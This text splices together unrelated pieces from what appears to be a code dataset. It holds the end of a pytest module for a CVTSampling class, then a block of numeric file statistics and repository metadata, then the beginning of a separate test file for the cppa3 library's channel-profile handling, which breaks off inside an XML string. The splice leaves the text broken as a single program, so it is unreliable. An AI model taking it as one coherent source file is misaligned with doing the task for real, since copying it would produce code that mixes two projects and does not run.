            CVTSampling(input_array, number_of_samples=None,
                        tolerance=None, sampling_type=1)

    @pytest.mark.unit
    def test__init__creation_selection_02(self):
        # Unrecognised sampling_type string is invalid.
        # BUG FIX: this test previously instantiated LatinHypercubeSampling,
        # so CVTSampling's sampling_type validation was never exercised.
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            CVTSampling(input_array, number_of_samples=None,
                        tolerance=None, sampling_type='jp')

    @pytest.mark.unit
    def test_random_sample_selection_01(self):
        # Normal case: samples are in [0, 1] with the requested shape.
        size = (5, 2)
        out_random_points = CVTSampling.random_sample_selection(size[0], size[1])
        assert (out_random_points >= 0).all() and (out_random_points <= 1).all()
        assert out_random_points.shape == size

    @pytest.mark.unit
    def test_random_sample_selection_02(self):
        # Degenerate case: zero rows.
        size = (0, 2)
        out_random_points = CVTSampling.random_sample_selection(size[0], size[1])
        assert (out_random_points >= 0).all() and (out_random_points <= 1).all()
        assert out_random_points.shape == size

    @pytest.mark.unit
    def test_random_sample_selection_03(self):
        # Degenerate case: zero columns.
        size = (2, 0)
        out_random_points = CVTSampling.random_sample_selection(size[0], size[1])
        assert (out_random_points >= 0).all() and (out_random_points <= 1).all()
        assert out_random_points.shape == size

    @pytest.mark.unit
    def test_random_sample_selection_04(self):
        # Negative dimension raises ValueError.
        size = (5, -1)
        with pytest.raises(ValueError):
            CVTSampling.random_sample_selection(size[0], size[1])

    @pytest.mark.unit
    def test_random_sample_selection_05(self):
        # Non-integer dimension raises TypeError.
        size = (5, 1.1)
        with pytest.raises(TypeError):
            CVTSampling.random_sample_selection(size[0], size[1])

    @pytest.mark.unit
    def test_eucl_distance_01(self):
        # Single-value arrays.
        u = np.array([[3]])
        v = np.array([[5]])
        expected_output = 2
        output = CVTSampling.eucl_distance(u, v)
        assert expected_output == output

    @pytest.mark.unit
    def test_eucl_distance_02(self):
        # 2D vectors.
        u = np.array([[1, 2]])
        v = np.array([[3, 4]])
        expected_output = 8 ** 0.5
        output = CVTSampling.eucl_distance(u, v)
        assert expected_output == output

    @pytest.mark.unit
    def test_eucl_distance_03(self):
        # Equal-sized arrays: one distance per row.
        u = np.array([[1, 2], [3, 4]])
        v = np.array([[5, 6], [7, 8]])
        expected_output = np.array([32 ** 0.5, 32 ** 0.5])
        output = CVTSampling.eucl_distance(u, v)
        np.testing.assert_array_equal(expected_output, output)

    @pytest.mark.unit
    def test_eucl_distance_04(self):
        # Single point against a set of design points (broadcasting).
        # BUG FIX: a stray trailing backslash previously joined this assertion
        # to the next decorator line, evaluating `None @ pytest.mark.unit` at
        # runtime (TypeError) and stripping the marker from the next test.
        u = np.array([[1, 2]])
        v = np.array([[5, 6], [7, 8]])
        expected_output = np.array([32 ** 0.5, 72 ** 0.5])
        output = CVTSampling.eucl_distance(u, v)
        np.testing.assert_array_equal(expected_output, output)

    @pytest.mark.unit
    def test_create_centres_01(self):
        # Counter at its lowest value (1).
        initial_centres = np.array([[0, 0], [1, 1]])
        current_random_points = np.array([[0.6, 0.6], [0.3, 0.3]])
        current_centres = np.array([1, 0])
        counter = 1
        expected_output = np.array([[0.15, 0.15], [0.8, 0.8]])
        output = CVTSampling.create_centres(
            initial_centres, current_random_points, current_centres, counter)
        np.testing.assert_array_equal(expected_output, output)

    @pytest.mark.unit
    def test_create_centres_02(self):
        # Counter at an arbitrary value (10).
        initial_centres = np.array([[0, 0], [1, 1]])
        current_random_points = np.array([[0.6, 0.6], [0.3, 0.3]])
        current_centres = np.array([1, 0])
        counter = 10
        expected_output = np.array([[0.3 / 11, 0.3 / 11],
                                    [10.6 / 11, 10.6 / 11]])
        output = CVTSampling.create_centres(
            initial_centres, current_random_points, current_centres, counter)
        np.testing.assert_array_equal(expected_output, output)

    @pytest.mark.unit
    def test_create_centres_03(self):
        # One centre has no close design point.
        initial_centres = np.array([[0, 0], [1, 1]])
        current_random_points = np.array([[0.6, 0.6], [0.8, 0.8]])
        current_centres = np.array([1, 1])
        counter = 5
        expected_output = np.array([[0.5 / 6, 0.5 / 6], [5.7 / 6, 5.7 / 6]])
        output = CVTSampling.create_centres(
            initial_centres, current_random_points, current_centres, counter)
        np.testing.assert_array_equal(expected_output, output)

    @pytest.mark.unit
    def test_create_centres_04(self):
        # More than two dimensions.
        initial_centres = np.array([[0, 0, 0], [1, 1, 1]])
        current_random_points = np.array(
            [[0.1, 0.1, 0.1], [0.3, 0.3, 0.3], [0.5, 0.5, 0.5],
             [0.7, 0.7, 0.7], [0.9, 0.9, 0.9]])
        current_centres = np.array([0, 0, 0, 1, 1])
        counter = 4
        expected_output = np.array([[0.3 / 5, 0.3 / 5, 0.3 / 5],
                                    [4.8 / 5, 4.8 / 5, 4.8 / 5]])
        output = CVTSampling.create_centres(
            initial_centres, current_random_points, current_centres, counter)
        np.testing.assert_array_equal(expected_output, output)

    @pytest.mark.component
    def test_sample_points_01(self):
        # Selection mode: samples are unique rows drawn from the input data.
        for num_samples in [None, 10, 1]:
            input_array = self.test_data_numpy
            CVTClass = CVTSampling(input_array, number_of_samples=num_samples,
                                   tolerance=None, sampling_type="selection")
            unique_sample_points = CVTClass.sample_points()
            expected_testing = np.array(
                [True] * unique_sample_points.shape[0], dtype=bool)
            out_testing = [unique_sample_points[i, :] in input_array
                           for i in range(unique_sample_points.shape[0])]
            np.testing.assert_array_equal(
                np.unique(unique_sample_points, axis=0), unique_sample_points)
            np.testing.assert_array_equal(expected_testing, out_testing)

    @pytest.mark.component
    def test_sample_points_02(self):
        # Creation mode: samples are unique and within each variable's bounds.
        for num_samples in [None, 10, 1]:
            input_array = self.test_data_list
            CVTClass = CVTSampling(input_array, number_of_samples=num_samples,
                                   sampling_type="creation")
            unique_sample_points = CVTClass.sample_points()
            input_array = np.array(input_array)
            for i in range(input_array.shape[1]):
                var_range = input_array[:, i]
                assert (unique_sample_points[:, i] >= var_range[0]).all() and \
                       (unique_sample_points[:, i] <= var_range[1]).all()
            np.testing.assert_array_equal(
                np.unique(unique_sample_points, axis=0).shape,
                unique_sample_points.shape)
# Allow running this test module directly via the unittest runner.
if __name__ == '__main__':
    unittest.main()
| 53.926389
| 382
| 0.696075
| 10,847
| 77,654
| 4.664423
| 0.034203
| 0.075304
| 0.039016
| 0.047376
| 0.929202
| 0.910821
| 0.89663
| 0.881293
| 0.854195
| 0.829726
| 0
| 0.047463
| 0.206931
| 77,654
| 1,439
| 383
| 53.963864
| 0.774085
| 0.195186
| 0
| 0.757426
| 0
| 0
| 0.012861
| 0
| 0
| 0
| 0
| 0
| 0.152475
| 1
| 0.146535
| false
| 0
| 0.005941
| 0
| 0.158416
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3ed25b7995d14c366569f244a4cc6e4cd2095a3
| 78,411
|
py
|
Python
|
tests/test_profile.py
|
fspijkerman/cppa3
|
d9af606fd96f1f32a07333011d46c4691e108558
|
[
"MIT"
] | null | null | null |
tests/test_profile.py
|
fspijkerman/cppa3
|
d9af606fd96f1f32a07333011d46c4691e108558
|
[
"MIT"
] | null | null | null |
tests/test_profile.py
|
fspijkerman/cppa3
|
d9af606fd96f1f32a07333011d46c4691e108558
|
[
"MIT"
] | null | null | null |
import unittest, lxml, logging, os
from inspect import getsourcefile
from os.path import abspath, dirname, join
from cppa3.profile import ChannelProfileHandler
from lxml import etree
class ProfileTestCase( unittest.TestCase ):
def setUp(self):
logging.getLogger('').handlers = []
logging.basicConfig(level=logging.DEBUG,
filename="profile_test.log")
thisdir = dirname(abspath(getsourcefile(lambda:0)))
self.configdatadir = join(thisdir,'config')
config_file = os.path.join(self.configdatadir,
'channelprofiles.xml')
parser = lxml.etree.XMLParser(remove_blank_text=True)
configuration_data = lxml.etree.parse(config_file, parser)
self.handler = ChannelProfileHandler(configuration_data)
self.parser = parser
def _test_regression(self, id, created, expected):
created_as_text = lxml.etree.tostring(created,
pretty_print=True)
expected_as_text = lxml.etree.tostring(expected,
pretty_print=True)
if created_as_text != expected_as_text:
logging.info('Created {}:\n{}\nExpected:{}\n'.format(id,
created_as_text,
expected_as_text))
raise Exception('{}: created:\n{}\nExpected:\n{}'.format(id,
created_as_text,
expected_as_text))
else:
logging.info('Regression test for {} passed'.format(id))
    def test_0001(self):
        """Applying the 'as4ebhandler' channel profile must merge in defaults
        (SOAPVersion 1.2, WSSVersion 1.1, a SHA-256 DigestAlgorithm) around
        the signature algorithm already present in the input CPP."""
        logging.info('Test 0001')
        data = etree.fromstring("""<?xml version="1.0"
encoding="UTF-8"?><cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel
xmlns:pycppa3="https://pypi.python.org/pypi/cppa3">
<cppa:ChannelProfile>http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/cprofiles/200809/as4ebhandler</cppa:ChannelProfile>
<cppa:WSSecurityBinding>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2001/04/xmldsig-more#rsa-sha256</cppa:SignatureAlgorithm>
</cppa:Signature>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel></cppa:CPP>
""", self.parser)
        result = self.handler.apply_profile_configs(data)
        logging.info('Result: {}'.format(lxml.etree.tostring(result,
                                                             pretty_print=True)))
        # Expected: input content preserved, profile defaults added.
        expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel>
<cppa:ChannelProfile>http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/cprofiles/200809/as4ebhandler</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2001/04/xmldsig-more#rsa-sha256</cppa:SignatureAlgorithm>
<cppa:DigestAlgorithm>http://www.w3.org/2001/04/xmlenc#sha256</cppa:DigestAlgorithm>
</cppa:Signature>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
        self._test_regression('0001', result, expected)
    def test_0002(self):
        """Profile 'multi_enc_alg' with pycppa3:ifused="true" on the security
        binding: the profile's encryption algorithms must be added when the
        input specifies none of its own."""
        logging.info('Test 0002')
        data = etree.fromstring("""<?xml version="1.0"
encoding="UTF-8"?><cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel
xmlns:pycppa3="https://pypi.python.org/pypi/cppa3">
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:WSSecurityBinding pycppa3:ifused="true">
<cppa:WSSVersion>1.1</cppa:WSSVersion>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel></cppa:CPP>
""", self.parser)
        result = self.handler.apply_profile_configs(data)
        logging.info('Result: {}'.format(lxml.etree.tostring(result,
                                                             pretty_print=True)))
        # Expected: both profile encryption algorithms appear in the output.
        expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel>
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
<cppa:EncryptionAlgorithm>http://www.w3.org/2001/04/xmlenc#aes128-cbc</cppa:EncryptionAlgorithm>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
        self._test_regression('0002', result, expected)
    def test_0003(self):
        """Profile 'multi_enc_alg': when the input already selects one of the
        profile's encryption algorithms, only that algorithm is kept."""
        logging.info('Test 0003')
        data = etree.fromstring("""<?xml version="1.0"
encoding="UTF-8"?><cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel
xmlns:pycppa3="https://pypi.python.org/pypi/cppa3">
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:WSSecurityBinding pycppa3:ifused="true">
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel></cppa:CPP>
""", self.parser)
        result = self.handler.apply_profile_configs(data)
        logging.info('Result: {}'.format(lxml.etree.tostring(result,
                                                             pretty_print=True)))
        # Expected: the single selected algorithm survives, nothing is added.
        expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel>
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
        self._test_regression('0003', result, expected)
    def test_0004(self):
        """Profile 'multi_enc_alg': an input Encryption element that only sets
        EncryptAttachments still receives the profile's algorithm list."""
        logging.info('Test 0004')
        data = etree.fromstring("""<?xml version="1.0"
encoding="UTF-8"?><cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel
xmlns:pycppa3="https://pypi.python.org/pypi/cppa3">
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptAttachments>true</cppa:EncryptAttachments>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel></cppa:CPP>
""", self.parser)
        result = self.handler.apply_profile_configs(data)
        logging.info('Result: {}'.format(lxml.etree.tostring(result,
                                                             pretty_print=True)))
        # Expected: both profile algorithms added before EncryptAttachments.
        expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel>
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
<cppa:EncryptionAlgorithm>http://www.w3.org/2001/04/xmlenc#aes128-cbc</cppa:EncryptionAlgorithm>
<cppa:EncryptAttachments>true</cppa:EncryptAttachments>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
        self._test_regression('0004', result, expected)
    def test_0005(self):
        """Profile 'multi_enc_alg': when the input supplies its own full list
        of encryption algorithms, that list is preserved unchanged."""
        logging.info('Test 0005')
        data = etree.fromstring("""<?xml version="1.0"
encoding="UTF-8"?><cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel
xmlns:pycppa3="https://pypi.python.org/pypi/cppa3">
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:WSSecurityBinding pycppa3:ifused="true">
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes256-gcm</cppa:EncryptionAlgorithm>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel></cppa:CPP>
""", self.parser)
        result = self.handler.apply_profile_configs(data)
        logging.info('Result: {}'.format(lxml.etree.tostring(result,
                                                             pretty_print=True)))
        # Expected: the two input algorithms survive as given.
        expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel>
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes256-gcm</cppa:EncryptionAlgorithm>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
        self._test_regression('0005', result, expected)
    # @unittest.skip('Fix later')  -- kept from original; test currently runs
    def test_0006(self):
        """ENTSOG AS4 UserMessageChannel profile: certificate refs and retry
        count from the input are kept, and the profile contributes the
        description, includeAgreementRef, key-encryption parameters, duplicate
        handling, error handling and compression defaults."""
        logging.info('Test 0006')
        data = etree.fromstring("""<?xml version="1.0" encoding="UTF-8"?>
<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel package="entsog_package">
<cppa:ChannelProfile>http://www.entsog.eu/publications/as4#AS4-USAGE-PROFILE/v2.0/UserMessageChannel</cppa:ChannelProfile>
<cppa:WSSecurityBinding>
<cppa:Signature>
<cppa:SigningCertificateRef certId="_OYHRBO"/>
</cppa:Signature>
<cppa:Encryption>
<cppa:EncryptionCertificateRef certId="_YE5XZF"/>
</cppa:Encryption>
</cppa:WSSecurityBinding>
<cppa:AS4ReceptionAwareness>
<cppa:RetryHandling>
<cppa:Retries>10</cppa:Retries>
</cppa:RetryHandling>
</cppa:AS4ReceptionAwareness>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
        result = self.handler.apply_profile_configs(data)
        logging.info('Result: {}'.format(lxml.etree.tostring(result,
                                                             pretty_print=True)))
        # Expected: full ENTSOG channel expansion; input Retries=10 overrides
        # the profile default.
        expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel package="entsog_package" includeAgreementRef="false">
<cppa:Description xml:lang="en">Channel for any ENTSOG AS4 User Messages</cppa:Description>
<cppa:ChannelProfile>http://www.entsog.eu/publications/as4#AS4-USAGE-PROFILE/v2.0/UserMessageChannel</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Signature>
<cppa:SignatureAlgorithm>https://www.w3.org/2001/04/xmldsig-more#rsa-sha256</cppa:SignatureAlgorithm>
<cppa:DigestAlgorithm>http://www.w3.org/2001/04/xmlenc#sha256</cppa:DigestAlgorithm>
<cppa:SigningCertificateRef certId="_OYHRBO"/>
</cppa:Signature>
<cppa:Encryption>
<cppa:KeyEncryption>
<cppa:EncryptionAlgorithm> http://www.w3.org/2009/xmlenc11#rsa-oaep</cppa:EncryptionAlgorithm>
<cppa:MaskGenerationFunction>http://www.w3.org/2009/xmlenc11#mgf1sha256</cppa:MaskGenerationFunction>
<cppa:DigestAlgorithm>http://www.w3.org/2001/04/xmlenc#sha256</cppa:DigestAlgorithm>
</cppa:KeyEncryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
<cppa:EncryptionCertificateRef certId="_YE5XZF"/>
</cppa:Encryption>
</cppa:WSSecurityBinding>
<cppa:AS4ReceptionAwareness>
<cppa:DuplicateHandling>
<cppa:DuplicateElimination>true</cppa:DuplicateElimination>
<cppa:PersistDuration>P10D</cppa:PersistDuration>
</cppa:DuplicateHandling>
<cppa:RetryHandling>
<cppa:Retries>10</cppa:Retries>
<cppa:RetryInterval>PT30S</cppa:RetryInterval>
</cppa:RetryHandling>
</cppa:AS4ReceptionAwareness>
<cppa:ErrorHandling>
<cppa:DeliveryFailuresNotifyProducer>true</cppa:DeliveryFailuresNotifyProducer>
</cppa:ErrorHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/gzip</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:ebMS3Channel>
</cppa:CPP>
""", self.parser)
        self._test_regression('0006', result, expected)
    def test_0007(self):
        """ENTSOG AS4 UserMessageChannel profile, receive-side channel: input
        id/transport/package attributes and its Description, ErrorHandling,
        ReceiptHandling and Compression elements are kept; profile defaults
        (incl. Retries=5, no override in the input) are merged in."""
        logging.info('Test 0007')
        data = etree.fromstring("""<?xml version="1.0" encoding="UTF-8"?>
<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel id="ch_receive" transport="tr_receive" package="entsog_package">
<cppa:Description xml:lang="en">Channel for incoming ENTSOG AS4 User Messages</cppa:Description>
<cppa:ChannelProfile>http://www.entsog.eu/publications/as4#AS4-USAGE-PROFILE/v2.0/UserMessageChannel</cppa:ChannelProfile>
<cppa:WSSecurityBinding>
<cppa:Encryption>
<cppa:EncryptionCertificateRef certId="_YE5XZF"/>
</cppa:Encryption>
</cppa:WSSecurityBinding>
<cppa:ErrorHandling>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
</cppa:ReceiptHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/gzip</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
        result = self.handler.apply_profile_configs(data)
        logging.info('Result: {}'.format(lxml.etree.tostring(result,
                                                             pretty_print=True)))
        # Expected: full expansion with profile signature and key-encryption
        # defaults added; profile RetryHandling uses Retries=5 here.
        expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel id="ch_receive" transport="tr_receive" package="entsog_package" includeAgreementRef="false">
<cppa:Description xml:lang="en">Channel for incoming ENTSOG AS4 User Messages</cppa:Description>
<cppa:ChannelProfile>http://www.entsog.eu/publications/as4#AS4-USAGE-PROFILE/v2.0/UserMessageChannel</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Signature>
<cppa:SignatureAlgorithm>https://www.w3.org/2001/04/xmldsig-more#rsa-sha256</cppa:SignatureAlgorithm>
<cppa:DigestAlgorithm>http://www.w3.org/2001/04/xmlenc#sha256</cppa:DigestAlgorithm>
</cppa:Signature>
<cppa:Encryption>
<cppa:KeyEncryption>
<cppa:EncryptionAlgorithm> http://www.w3.org/2009/xmlenc11#rsa-oaep</cppa:EncryptionAlgorithm>
<cppa:MaskGenerationFunction>http://www.w3.org/2009/xmlenc11#mgf1sha256</cppa:MaskGenerationFunction>
<cppa:DigestAlgorithm>http://www.w3.org/2001/04/xmlenc#sha256</cppa:DigestAlgorithm>
</cppa:KeyEncryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
<cppa:EncryptionCertificateRef certId="_YE5XZF"/>
</cppa:Encryption>
</cppa:WSSecurityBinding>
<cppa:AS4ReceptionAwareness>
<cppa:DuplicateHandling>
<cppa:DuplicateElimination>true</cppa:DuplicateElimination>
<cppa:PersistDuration>P10D</cppa:PersistDuration>
</cppa:DuplicateHandling>
<cppa:RetryHandling>
<cppa:Retries>5</cppa:Retries>
<cppa:RetryInterval>PT30S</cppa:RetryInterval>
</cppa:RetryHandling>
</cppa:AS4ReceptionAwareness>
<cppa:ErrorHandling>
<cppa:DeliveryFailuresNotifyProducer>true</cppa:DeliveryFailuresNotifyProducer>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
</cppa:ReceiptHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/gzip</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:ebMS3Channel>
</cppa:CPP>
""", self.parser)
        self._test_regression('0007', result, expected)
def test_0008(self):
logging.info('Test 0008')
data = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://docs.oasis-open.org/ebxmlcppa/cppa-3.0 file:../../../cppa3-xsd/cppa3.xsd">
<cppa:ProfileInfo>
<cppa:ProfileIdentifier>EASEE-gas AS2 Profile for TSO 2</cppa:ProfileIdentifier>
</cppa:ProfileInfo>
<cppa:PartyInfo>
<cppa:PartyName xml:lang="en">TSO 2</cppa:PartyName>
<cppa:PartyId type="http://www.entsoe.eu/eic-codes/eic-party-codes-x">21X-EU-B-A0A0A-B</cppa:PartyId>
<cppa:PartyContact>
<cppa:ContactType>Technical Contact</cppa:ContactType>
<cppa:DirectTelephone>+3761234560</cppa:DirectTelephone>
<cppa:Email>edi@tso2.eu</cppa:Email>
</cppa:PartyContact>
<cppa:Certificate id="_SCNXER">
<ds:KeyInfo>
<ds:KeyName>Signing certificate for TSO 2</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:Certificate id="_4UP74O">
<ds:KeyInfo>
<ds:KeyName>Encryption certificate for TSO 2</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBhbmRlciBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:CertificateDefaults>
<cppa:SigningCertificateRef certId="_SCNXER"/>
<cppa:EncryptionCertificateRef certId="_4UP74O"/>
</cppa:CertificateDefaults>
</cppa:PartyInfo>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZSZ"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_1_2">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_1_4">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A10</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_2_6">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_2_8">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZHC"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_3_10">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUA"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_4_12">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUF"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A11</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_5_14">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_6_16">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
